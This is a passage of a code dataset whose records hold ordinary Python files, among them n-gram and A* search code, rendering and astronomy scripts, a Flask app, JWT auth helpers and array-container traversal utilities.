sentence):\n        \"\"\"\n        Requires: sentence is a list of strings, and trainingDataHasNGram\n                  has returned True for this particular language model\n        Modifies: nothing\n        Effects:  returns the dictionary of candidate next words to be added\n                 to the current sentence. 
For details on which words the\n                 TrigramModel sees as candidates, see the spec.\n        \"\"\"\n        # Returns the dict of candidate fourth words for the last three words\n        return self.nGramCounts[sentence[-3]][sentence[-2]][sentence[-1]]\n\n###############################################################################\n# End Core\n###############################################################################\n\n###############################################################################\n# Main\n###############################################################################\n\nif __name__ == '__main__':\n    # An example trainModel test case\n    uni = QuadgramModel()\n\n    text1 = [ ['the', 'brown', 'fox']]\n    uni.trainModel(text1)\n\n    uni2 = QuadgramModel()\n    text = [ ['the', 'brown', 'fox', 'fled','the', 'brown', 'fox'], ['the', 'brown', 'fox'] ]\n    uni2.trainModel(text)\n\n    print(uni2)\n\n    sentence = ['he', 'smelled', 'the', 'brown', 'fox']\n    print(uni2.getCandidateDictionary(sentence))\n","sub_path":"creative_ai/models/quadgramModel.py","file_name":"quadgramModel.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"91926439","text":"def shortest_path(M, start, goal):\n    print(\"shortest path called\")\n\n    # A*-style search: frontier maps node -> path taken so far (excluding the node itself)\n    frontier = dict([(i,[start]) for i in M.roads[start]]) if start!=goal else {start:[]}\n    explored = set([start])\n\n    while frontier:\n        explore = g_h(M, frontier, goal)\n        for i in [i for i in M.roads[explore] if i not in frontier.keys()|explored]:\n            frontier[i] = frontier[explore] + [explore]\n        frontier = remove_frontier(M, frontier)\n\n        if explore == goal:\n            return frontier[explore] + [explore]\n\n        explored.add(explore)\n        del frontier[explore]\n\ndef heuristic(M, a, b):\n    # straight-line (Euclidean) distance between intersections a and b\n    M=M.intersections\n    return ((M[a][0]-M[b][0])**2+(M[a][1]-M[b][1])**2)**0.5\n\ndef g_h(M, frontier, goal):\n    # return the frontier node with the smallest f = g + h\n    g_h = dict([(path_costs(M, frontier[node] + [node]) + heuristic(M, node, goal), node) for node in frontier])\n    return g_h[min(g_h)]\n\ndef path_costs(M, path, cost=0):\n    # total Euclidean length of the path\n    M=M.intersections\n    for i in range(len(path) - 1):\n        cost += ((M[path[i]][0] - M[path[i+1]][0])**2 + (M[path[i]][1] - M[path[i+1]][1])**2)**0.5\n    return cost\n\ndef remove_frontier(M, frontier):\n    # prune frontier entries whose path is beaten by a cheaper path through a neighbor\n    delete = []\n    nodes = list(frontier.keys())\n    for node in nodes:\n        for i in [i for i in nodes if i != node]:\n            if frontier[i] != frontier[node]:\n                if i in M.roads[node]:\n                    if path_costs(M, frontier[node]+[node]+[i]) < path_costs(M, frontier[i]+[i]):\n                        delete.append(i)\n    for i in delete:\n        if i in frontier:\n            del frontier[i]\n    return frontier\n","sub_path":"Project/route_planner_project/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"125202184","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nsimple rendering example with specific background image\n\"\"\"\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nimport neural_renderer as nr\n\n\n# setup render\nimg_size = 256\nrenderer = nr.Renderer(camera_mode='look_at', image_size=img_size)\nrenderer.perspective = True\nrenderer.eye = [0, 0, -2.732]\nrenderer.near = 0.1\nrenderer.far = 100.0\n\n# for brighter visualization\nrenderer.light_intensity_ambient = 1.\nrenderer.light_intensity_directional = 0\n\n# load obj with default texture image\nverts, faces, textures = nr.load_obj('data/human.obj', load_texture=True)\nverts[:, 1] *= -1.\nverts = 
verts[None, :, :]\nfaces = faces[None, :, :]\ntextures = textures[None, :, :]\n\nimage_rendered, _, _ = renderer.render(verts, faces, textures)\nimage_1 = (image_rendered[0].cpu().numpy()).transpose((1, 2, 0))\n\n# load obj with other texture\nverts, faces, textures = nr.load_obj('data/human.obj', load_texture=True, texture_image='data/human2.jpg')\nverts[:, 1] *= -1.\nverts = verts[None, :, :]\nfaces = faces[None, :, :]\ntextures = textures[None, :, :]\n\nimage_rendered, _, _ = renderer.render(verts, faces, textures)\nimage_2 = (image_rendered[0].cpu().numpy()).transpose((1, 2, 0))\n\n# render on other background image\nrenderer.background_image = 'data/background.jpg'\nimage_rendered, _, _ = renderer.render(verts, faces, textures)\nimage_3 = (image_rendered[0].cpu().numpy()).transpose((1, 2, 0))\n\n# plot results\nplt.figure()\n\nplt.subplot(131)\nplt.title('default texture')\nplt.imshow(image_1)\nplt.axis('off')\nplt.subplot(132)\nplt.title('specific texture')\nplt.imshow(image_2)\nplt.axis('off')\nplt.subplot(133)\nplt.title('specific background')\nplt.imshow(image_3)\nplt.axis('off')\nplt.draw()\nplt.savefig('data/result_example5.png', dpi=300)\n","sub_path":"examples/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255290524","text":"import numpy as np\nfrom datetime import datetime, timedelta\nimport common.tools as ctools\nloc_f10_7 = '/Volumes/Gravity/work/data/sun/OMNIWeb/F10.7/'\nloc_horizons = '/Volumes/Gravity/work/data/exceed/horizons_py/'\n\nimport glob\nfrom MyRc import HskRc\nrc = HskRc()\n\ndef interp(Dt_new, Dt, y):\n if type(Dt_new) is datetime:\n time_new = datetime.timestamp(Dt_new)\n else:\n time_new = np.array([datetime.timestamp(iDt) for iDt in Dt_new])\n time = np.array([datetime.timestamp(iDt) for iDt in Dt])\n y_new = np.interp(time_new, time, y)\n return y_new\n\n\ndef get_f10_7(avg27day=True):\n\n fname = loc_f10_7 + 'omni2_27day_F10.7_1970-2019.txt'\n #fname = loc_f10_7 + 'omni2_daily_F10.7_1970-2020.txt'\n data = np.genfromtxt(fname)\n\n return data\n\n\nclass Horizons():\n def __init__(self, name):\n self.name = name\n path = '/Volumes/Gravity/work/data/exceed/horizons_py/'\n pattern = 'mars_' + str(name) + '.txt'\n self.fname = ctools.file_search(pattern, path)\n self.__get_fileinfo()\n dtype = [('U11'), ('U5'), ('f8'), ('f8'), ('f8'), ('f8'), ('f8'), ('f8'), ('f8'), ('U2'), ('f8')]\n data = np.genfromtxt(self.fname, dtype=dtype,\n skip_header=self.skip_header, skip_footer=self.skip_footer)\n nrow = data.shape[0]\n self.timeDt = np.array([datetime.strptime(data[i][0]+data[i][1], '%Y-%b-%d%H:%M') for i in np.arange(nrow)])\n self.illu = np.array([data[i][2] for i in np.arange(nrow)])\n self.diam = np.array([data[i][3] for i in np.arange(nrow)])\n self.st_dist = np.array([data[i][4] for i in np.arange(nrow)])\n self.et_dist = np.array([data[i][6] for i in np.arange(nrow)])\n self.sot_angle = np.array([data[i][8] for i in np.arange(nrow)])\n self.sot_dir = np.array([data[i][9] for i in np.arange(nrow)])\n self.sto_angle = np.array([data[i][10] for i in np.arange(nrow)])\n\n def __get_fileinfo(self):\n\n if self.name == 'hut':\n self.skip_header = 62\n sfooter = 1480\n efooter = 1585\n nempty = 20\n self.skip_footer = efooter - sfooter + 1 - nempty\n\n if self.name == 'fuse':\n self.skip_header = 62\n sfooter = 1528\n efooter = 1633\n nempty = 20\n self.skip_footer = efooter - sfooter + 1 - nempty\n\n if self.name == 
'rosetta':\n            self.skip_header = 62\n            sfooter = 1480\n            efooter = 1585\n            nempty = 20\n            self.skip_footer = efooter - sfooter + 1 - nempty\n\n## load f10.7 data\ndata = get_f10_7()\nyear = [int(idat) for idat in data[:, 0]]\ndoy = [int(idat) for idat in data[:, 1]]\nf10_7 = data[:, 3]\n\n## set datetimes of hut, fuse, and rosetta observations\ntimeDt = np.array([datetime(iyear, 1, 1) + timedelta(idoy - 1) for iyear, idoy in zip(year, doy)])\nDt_hut = datetime(1995, 3, 12)\nDt_fuse = datetime(2001, 5, 12)\nDt_rosetta = datetime(2007, 2, 25)\nDt_hsk = datetime(2019, 2, 23)\n\nlinename = 'OI1304'\nfname = rc.saveloc + 'mars/npy/calcbr/'+linename+'/'+linename+'_p*.npy'\nfname_list = glob.glob(fname)\ntimeDt_list = []\n\nfor ifname in fname_list:\n    idic = np.load(ifname, allow_pickle=True).item()\n    timeDt_list.append(idic['timeDt_mean'])\n\n# List to array\ntimeDt_arr = np.array(timeDt_list)\nidx = np.argsort(timeDt_arr)\ntimeDt_arr = timeDt_arr[idx]\n\n## load mars ephemeris data as horizon object\n#hut = Horizons('hut')\n#fuse = Horizons('fuse')\n#rosetta = Horizons('rosetta')\n\nf10_7_hut = interp(Dt_hut, timeDt, f10_7)\nf10_7_fuse = interp(Dt_fuse, timeDt, f10_7)\nf10_7_rosetta = interp(Dt_rosetta, timeDt, f10_7)\nf10_7_hsk = interp(timeDt_arr, timeDt, f10_7)\n\nprint([Dt_hut, Dt_fuse, Dt_rosetta], [f10_7_hut, f10_7_fuse, f10_7_rosetta])\nprint(timeDt_arr, f10_7_hsk)\n","sub_path":"test/test_past_f10_7_at_mars.py","file_name":"test_past_f10_7_at_mars.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"593720731","text":"import datetime\nfrom cip.settings import DEBUG as d\n\ndef create():\n    # Build a file name from the local date, with '/' replaced by '.'\n    file_name = str(datetime.datetime.now().strftime(\"%x\") + \".txt\").replace('/', '.')\n\n    # @return: created file name as string\n    return str(file_name)\n\ndef write(text):\n    # Debug mode controls whether logging is on or off.\n    # It is a project-wide constant, stored in the settings\n    # file and imported here.\n    debug = d\n\n    # Retrieves file name\n    file_name = create()\n\n    # If debug is true, we can write trace files, i.e. logs.\n    # There are two branches, one for an existing log file and\n    # one for a missing log file.\n    # The try branch handles an existing file: 
its current lines are read\n    # and rewritten with the new trace line prepended.\n    # The except branch creates a new log file instead.\n    # The with statements close the file automatically in both cases.\n    if debug:\n        try:\n            with open(str(file_name), \"r+\") as log_file:\n                lines_in_log_file = log_file.read()\n                log_file.seek(0)\n                log_file.write(str(text) + \" @ \" + str(datetime.datetime.now()) + \"\\n\" + str(lines_in_log_file))\n        except FileNotFoundError:\n            with open(str(file_name), \"a\") as log_file:\n                log_file.write(str(text) + \" @ \" + str(datetime.datetime.now()) + \"\\n\")\n    # Otherwise (if debug is false) nothing is logged.\n    else:\n        print(\"Logging is disabled.\")\n\n","sub_path":"cip/cip_app/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"363487018","text":"import flask\nfrom flask import Flask\nimport json\nimport logic\napp = Flask(__name__)\n\n@app.route('/')\ndef dashboard():\n    return flask.render_template('dashboard.html')\n\n@app.route('/time_spent/<filteron>')\ndef time_spent(filteron):\n    if filteron == 'Overall':\n        filteron = None\n    response = logic.time_spent(df, filteron=filteron)\n    return json.dumps(response)\n\n@app.route('/progress/<filteron>/<user_id>')\ndef progress(filteron, user_id):\n    if filteron == 'Overall':\n        filteron = None\n    response = logic.absolute_progress_against_peer_group(df, filteron=filteron, user_id=int(user_id))\n    return json.dumps(response)\n\n@app.route('/students')\ndef students():\n    return json.dumps(logic.student_list())\n\nif __name__ == '__main__':\n    df = logic.load_data()\n    app.run(host='0.0.0.0', port=5000, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"291892152","text":"import flopy\nimport os\nimport shutil\n\n\nproj4 = '+proj=aea +lat_1=27.5 +lat_2=35 +lat_0=31.25 +lon_0=-100 +x_0=1500000 +y_0=6000000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=us-ft +no_defs'\n\noffset = 160/2\n\nxul, yul = 5661342.80316535942256451 - offset, 19628009.74438977241516113 + offset\n\n\nmf = flopy.modflow.Modflow('grid')\n\n\nLx, Ly = 8000 + 160, 8000 + 160\n\nnrow, ncol = 51, 51\ndelr, delc = int(Lx/ncol), int(Ly/nrow)\n\n\n\n# nrow, ncol = 50, 50\n# delr, delc = 160, 160\noutputs = os.path.join('outputs')\nif not os.path.exists(outputs): os.mkdir(outputs)\nshapefiles = os.path.join('outputs','shapefiles')\nif not os.path.exists(shapefiles): os.mkdir(shapefiles)\n\ndis = flopy.modflow.ModflowDis(mf,1,nrow,ncol,lenuni=1,delr=delr,delc=delc,xul=xul, yul=yul,proj4_str=proj4)\n# mf.sr = flopy.utils.reference.SpatialReference(prj=os.path.join('gwpath_rasters','starting_location.prj'),delr=delr,delc=delc,yul=yul)\ndis.export(os.path.join(shapefiles,f'grid_offset_{nrow}.shp'))\n\nshutil.copy(os.path.join('texas_gam.prj'),os.path.join(shapefiles,f'grid_offset_{nrow}.prj'))\n","sub_path":"final_form/S01_make_model_grid.py","file_name":"S01_make_model_grid.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"12271504","text":"#! 
python3\r\n\r\nimport pyautogui\r\nimport time\r\n\r\npyautogui.PAUSE = 2\r\npyautogui.FAILSAFE = True\r\n\r\nprint(\"Press Ctrl-C to quit.\")\r\n\r\ntry:\r\n im = pyautogui.screenshot(region=(1720,330,15,15))\r\n im.save(\"./rerun.png\")\r\n\r\n \r\nexcept KeyboardInterrupt:\r\n print(\"Done\\n\")\r\n","sub_path":"scripts_rerun/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"69786680","text":"import sys\nimport os\nimport re\n# print(os.getcwd())\n# sys.stdin=open('practice/uva/5.STL/101-gen.in','r')\ninput = sys.stdin.readline\n\ndef printRes(res):\n for i in range(len(res)):\n tmpres = ' '.join(list(map(str, res[i])))\n print(str(i) + ':' + (tmpres if tmpres == '' else ' ' + tmpres))\n\n\nn = int(input())\nres = [[i] for i in range(n)]\ndef find(x):\n for i in range(len(res)):\n for j in range(len(res[i])):\n if res[i][j] == x:\n return [i, j]\ndef putBack(px, hx):\n for r in res[px][hx+1:]:\n res[r].append(r)\n res[px] = res[px][:hx+1]\ndef pileOver(pa, ha, pb):\n for i in range(ha, len(res[pa])):\n res[pb].append(res[pa][i])\n res[pa] = res[pa][:ha]\n\nwhile True:\n q = input().strip()\n # print(q)\n if q == 'quit':\n printRes(res)\n break\n [cmd1, a, cmd2, b] = q.split(' ')\n\n \n a = int(a)\n b = int(b)\n # print(q, res)\n [pa, ha] = find(a)\n [pb, hb] = find(b)\n if (pa == pb):\n continue\n\n if cmd2 == 'onto':\n putBack(pb, hb)\n if cmd1 == 'move':\n putBack(pa, ha)\n pileOver(pa, ha, pb)\n\n # print(res)\n # print(dic)\n","sub_path":"practice/uva/5.STL/101.py","file_name":"101.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"622503232","text":"import jwt\nimport os\nimport datetime\nfrom flask import json, Response, request, g, make_response\nfrom src.model.UserModel import User\nfrom functools import wraps\nfrom flask import jsonify\n\n\nclass Auth:\n\t\"\"\"\n\tAuth Class\n\t\"\"\"\n\n\t@staticmethod\n\tdef generate_token(user_id):\n\t\t\"\"\"\n\t\tGenerate Token Method\n\t\t:param user_id:\n\t\t:return:\n\t\t\"\"\"\n\t\ttry:\n\t\t\tpayload = {\n\t\t\t\t'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1),\n\t\t\t\t'iat': datetime.datetime.utcnow(),\n\t\t\t\t'public_id': user_id\n\t\t\t}\n\t\t\tprint(os.getenv('JWT_SECRET_KEY'))\n\t\t\ttoken = jwt.encode(\n\t\t\t\tpayload,\n\t\t\t\tos.getenv('JWT_SECRET_KEY'),\n\t\t\t\t'HS256'\n\t\t\t).decode(\"utf-8\")\n\n\t\t\treturn jsonify({'token': token})\n\n\t\texcept Exception:\n\t\t\treturn make_response('Could not generate token', 401, {'WWW-Authenticate': 'Basic realm=\"Login required!\"'})\n\n\t@staticmethod\n\tdef decode_token(token):\n\t\t\"\"\"\n\t\tDecode Token Method\n\t\t:param token:\n\t\t:return:\n\t\t\"\"\"\n\t\tre = {'data': {}, 'error': {}}\n\t\ttry:\n\t\t\tpayload = jwt.decode(token, os.getenv('JWT_SECRET_KEY'))\n\t\t\tre['data'] = {'public_id': payload['public_id']}\n\t\t\treturn re\n\t\texcept jwt.ExpiredSignatureError as e1:\n\t\t\tre['error'] = {'message': 'token expired, please login again'}\n\t\t\treturn re\n\t\texcept jwt.InvalidTokenError:\n\t\t\tre['error'] = {'message': 'Invalid token, please try again with a new token'}\n\t\treturn re\n\n\t# decorator\n\t@staticmethod\n\tdef auth_required(func):\n\t\t\"\"\"\n\t\tAuth decorator\n\t\t\"\"\"\n\n\t\t@wraps(func)\n\t\tdef decorated_auth(*args, **kwargs):\n\t\t\tif 'api-token' not in request.headers:\n\t\t\t\treturn 
Response(\n\t\t\t\t\tmimetype=\"application/json\",\n\t\t\t\t\tresponse=json.dumps({'error': 'token missing!'}),\n\t\t\t\t\tstatus=400\n\t\t\t\t)\n\t\t\ttoken = request.headers.get('api-token')\n\t\t\tdata = Auth.decode_token(token)\n\n\t\t\tif data['error']:\n\t\t\t\treturn Response(\n\t\t\t\t\tmimetype=\"application/json\",\n\t\t\t\t\tresponse=json.dumps(data['error']),\n\t\t\t\t\tstatus=400\n\t\t\t\t)\n\n\t\t\tpublic_id = data['data']['public_id']\n\t\t\tcheck_user = User.get_one_user(public_id)\n\t\t\tif not check_user:\n\t\t\t\treturn Response(\n\t\t\t\t\tmimetype=\"application/json\",\n\t\t\t\t\tresponse=json.dumps({'error': 'user does not exist, invalid token'}),\n\t\t\t\t\tstatus=400\n\t\t\t\t)\n\t\t\tg.user = {'public_id': public_id}\n\t\t\tcurrent_user = User.query.filter_by(public_id=data['data']['public_id']).first()\n\t\t\treturn func(current_user, *args, **kwargs)\n\n\t\treturn decorated_auth\n","sub_path":"src/shared/Authentication.py","file_name":"Authentication.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139083411","text":"# mypy: disallow-untyped-defs\n\n\"\"\"\n.. currentmodule:: arraycontext\n\n.. autofunction:: map_array_container\n.. autofunction:: multimap_array_container\n.. autofunction:: rec_map_array_container\n.. autofunction:: rec_multimap_array_container\n\n.. autofunction:: map_reduce_array_container\n.. autofunction:: multimap_reduce_array_container\n.. autofunction:: rec_map_reduce_array_container\n.. autofunction:: rec_multimap_reduce_array_container\n\nTraversing decorators\n~~~~~~~~~~~~~~~~~~~~~\n.. autofunction:: mapped_over_array_containers\n.. autofunction:: multimapped_over_array_containers\n\nFreezing and thawing\n~~~~~~~~~~~~~~~~~~~~\n.. autofunction:: freeze\n.. autofunction:: thaw\n\nNumpy conversion\n~~~~~~~~~~~~~~~~\n.. autofunction:: from_numpy\n.. autofunction:: to_numpy\n\"\"\"\n\n__copyright__ = \"\"\"\nCopyright (C) 2020-1 University of Illinois Board of Trustees\n\"\"\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nfrom typing import Any, Callable, Iterable, List, Optional, Union, Tuple\nfrom functools import update_wrapper, partial, singledispatch\n\nimport numpy as np\n\nfrom arraycontext.context import ArrayContext\nfrom arraycontext.container import (\n ContainerT, ArrayOrContainerT, is_array_container,\n serialize_container, deserialize_container)\n\n\n# {{{ array container traversal helpers\n\ndef _map_array_container_impl(\n f: Callable[[Any], Any],\n ary: ArrayOrContainerT, *,\n leaf_cls: Optional[type] = None,\n recursive: bool = False) -> ArrayOrContainerT:\n \"\"\"Helper for :func:`rec_map_array_container`.\n\n :param leaf_cls: class on which we call *f* directly. This is mostly\n useful in the recursive setting, where it can stop the recursion on\n specific container classes. By default, the recursion is stopped when\n a non-:class:`ArrayContainer` class is encountered.\n \"\"\"\n def rec(_ary: ArrayOrContainerT) -> ArrayOrContainerT:\n if type(_ary) is leaf_cls: # type(ary) is never None\n return f(_ary)\n elif is_array_container(_ary):\n return deserialize_container(_ary, [\n (key, frec(subary)) for key, subary in serialize_container(_ary)\n ])\n else:\n return f(_ary)\n\n frec = rec if recursive else f\n return rec(ary)\n\n\ndef _multimap_array_container_impl(\n f: Callable[..., Any],\n *args: Any,\n reduce_func: Callable[[ContainerT, Iterable[Tuple[Any, Any]]], Any] = None,\n leaf_cls: Optional[type] = None,\n recursive: bool = False) -> ArrayOrContainerT:\n \"\"\"Helper for :func:`rec_multimap_array_container`.\n\n :param leaf_cls: class on which we call *f* directly. This is mostly\n useful in the recursive setting, where it can stop the recursion on\n specific container classes. 
By default, the recursion is stopped when\n a non-:class:`ArrayContainer` class is encountered.\n \"\"\"\n def rec(*_args: Any) -> Any:\n template_ary = _args[container_indices[0]]\n if (type(template_ary) is leaf_cls\n or not is_array_container(template_ary)):\n return f(*_args)\n\n assert all(\n type(_args[i]) is type(template_ary) for i in container_indices[1:]\n ), f\"expected type '{type(template_ary).__name__}'\"\n\n result = []\n new_args = list(_args)\n\n for subarys in zip(*[\n serialize_container(_args[i]) for i in container_indices\n ]):\n key = None\n for i, (subkey, subary) in zip(container_indices, subarys):\n if key is None:\n key = subkey\n else:\n assert key == subkey\n\n new_args[i] = subary\n\n result.append((key, frec(*new_args))) # type: ignore[operator]\n\n return process_container(template_ary, result) # type: ignore[operator]\n\n container_indices: List[int] = [\n i for i, arg in enumerate(args)\n if is_array_container(arg) and type(arg) is not leaf_cls]\n\n if not container_indices:\n return f(*args)\n\n if len(container_indices) == 1 and reduce_func is None:\n # NOTE: if we just have one ArrayContainer in args, passing it through\n # _map_array_container_impl should be faster\n def wrapper(ary: ArrayOrContainerT) -> ArrayOrContainerT:\n new_args = list(args)\n new_args[container_indices[0]] = ary\n return f(*new_args)\n\n update_wrapper(wrapper, f)\n template_ary: ContainerT = args[container_indices[0]]\n return _map_array_container_impl(\n wrapper, template_ary,\n leaf_cls=leaf_cls, recursive=recursive)\n\n process_container = deserialize_container if reduce_func is None else reduce_func\n frec = rec if recursive else f\n\n return rec(*args)\n\n# }}}\n\n\n# {{{ array container traversal\n\ndef map_array_container(\n f: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n r\"\"\"Applies *f* to all components of an :class:`ArrayContainer`.\n\n Works similarly to :func:`~pytools.obj_array.obj_array_vectorize`, but\n on arbitrary containers.\n\n For a recursive version, see :func:`rec_map_array_container`.\n\n :param ary: a (potentially nested) structure of :class:`ArrayContainer`\\ s,\n or an instance of a base array type.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n return f(ary)\n else:\n return deserialize_container(ary, [\n (key, f(subary)) for key, subary in iterable\n ])\n\n\ndef multimap_array_container(f: Callable[..., Any], *args: Any) -> Any:\n r\"\"\"Applies *f* to the components of multiple :class:`ArrayContainer`\\ s.\n\n Works similarly to :func:`~pytools.obj_array.obj_array_vectorize_n_args`,\n but on arbitrary containers. 
The containers must all have the same type,\n which will also be the return type.\n\n For a recursive version, see :func:`rec_multimap_array_container`.\n\n :param args: all :class:`ArrayContainer` arguments must be of the same\n type and with the same structure (same number of components, etc.).\n \"\"\"\n return _multimap_array_container_impl(f, *args, recursive=False)\n\n\ndef rec_map_array_container(\n f: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n r\"\"\"Applies *f* recursively to an :class:`ArrayContainer`.\n\n For a non-recursive version see :func:`map_array_container`.\n\n :param ary: a (potentially nested) structure of :class:`ArrayContainer`\\ s,\n or an instance of a base array type.\n \"\"\"\n return _map_array_container_impl(f, ary, recursive=True)\n\n\ndef mapped_over_array_containers(\n f: Callable[[Any], Any]) -> Callable[[ArrayOrContainerT], ArrayOrContainerT]:\n \"\"\"Decorator around :func:`rec_map_array_container`.\"\"\"\n wrapper = partial(rec_map_array_container, f)\n update_wrapper(wrapper, f)\n return wrapper\n\n\ndef rec_multimap_array_container(f: Callable[..., Any], *args: Any) -> Any:\n r\"\"\"Applies *f* recursively to multiple :class:`ArrayContainer`\\ s.\n\n For a non-recursive version see :func:`multimap_array_container`.\n\n :param args: all :class:`ArrayContainer` arguments must be of the same\n type and with the same structure (same number of components, etc.).\n \"\"\"\n return _multimap_array_container_impl(f, *args, recursive=True)\n\n\ndef multimapped_over_array_containers(\n f: Callable[..., Any]) -> Callable[..., Any]:\n \"\"\"Decorator around :func:`rec_multimap_array_container`.\"\"\"\n # can't use functools.partial, because its result is insufficiently\n # function-y to be used as a method definition.\n def wrapper(*args: Any) -> Any:\n return rec_multimap_array_container(f, *args)\n\n update_wrapper(wrapper, f)\n return wrapper\n\n# }}}\n\n\n# {{{ keyed array container traversal\n\ndef keyed_map_array_container(f: Callable[[Any, Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n r\"\"\"Applies *f* to all components of an :class:`ArrayContainer`.\n\n Works similarly to :func:`map_array_container`, but *f* also takes an\n identifier of the array in the container *ary*.\n\n For a recursive version, see :func:`rec_keyed_map_array_container`.\n\n :param ary: a (potentially nested) structure of :class:`ArrayContainer`\\ s,\n or an instance of a base array type.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n raise ValueError(\n f\"Non-array container type has no key: {type(ary).__name__}\")\n else:\n return deserialize_container(ary, [\n (key, f(key, subary)) for key, subary in iterable\n ])\n\n\ndef rec_keyed_map_array_container(f: Callable[[Tuple[Any, ...], Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n \"\"\"\n Works similarly to :func:`rec_map_array_container`, except that *f* also\n takes in a traversal path to the leaf array. 
The traversal path argument is\n passed in as a tuple of identifiers of the arrays traversed before reaching\n the current array.\n \"\"\"\n\n def rec(keys: Tuple[Union[str, int], ...],\n _ary: ArrayOrContainerT) -> ArrayOrContainerT:\n try:\n iterable = serialize_container(_ary)\n except TypeError:\n return f(keys, _ary)\n else:\n return deserialize_container(_ary, [\n (key, rec(keys + (key,), subary)) for key, subary in iterable\n ])\n\n return rec((), ary)\n\n# }}}\n\n\n# {{{ array container reductions\n\ndef map_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> Any:\n \"\"\"Perform a map-reduce over array containers.\n\n :param reduce_func: callable used to reduce over the components of *ary*\n if *ary* is an :class:`~arraycontext.ArrayContainer`. The callable\n should be associative, as for :func:`rec_map_reduce_array_container`.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n return map_func(ary)\n else:\n return reduce_func([\n map_func(subary) for _, subary in iterable\n ])\n\n\ndef multimap_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[..., Any],\n *args: Any) -> Any:\n r\"\"\"Perform a map-reduce over multiple array containers.\n\n :param reduce_func: callable used to reduce over the components of any\n :class:`~arraycontext.ArrayContainer`\\ s in *\\*args*. The callable\n should be associative, as for :func:`rec_map_reduce_array_container`.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n \"\"\"\n # NOTE: this wrapper matches the signature of `deserialize_container`\n # to make plugging into `_multimap_array_container_impl` easier\n def _reduce_wrapper(ary: ContainerT, iterable: Iterable[Tuple[Any, Any]]) -> Any:\n return reduce_func([subary for _, subary in iterable])\n\n return _multimap_array_container_impl(\n map_func, *args,\n reduce_func=_reduce_wrapper, leaf_cls=None, recursive=False)\n\n\ndef rec_map_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> Any:\n \"\"\"Perform a map-reduce over array containers recursively.\n\n :param reduce_func: callable used to reduce over the components of *ary*\n (and those of its sub-containers) if *ary* is a\n :class:`~arraycontext.ArrayContainer`. Must be associative.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n\n .. note::\n\n The traversal order is unspecified. *reduce_func* must be associative in\n order to guarantee a sensible result. This is because *reduce_func* may be\n called on subsets of the component arrays, and then again (potentially\n multiple times) on the results. As an example, consider a container made up\n of two sub-containers, *subcontainer0* and *subcontainer1*, that each\n contain two component arrays, *array0* and *array1*. 
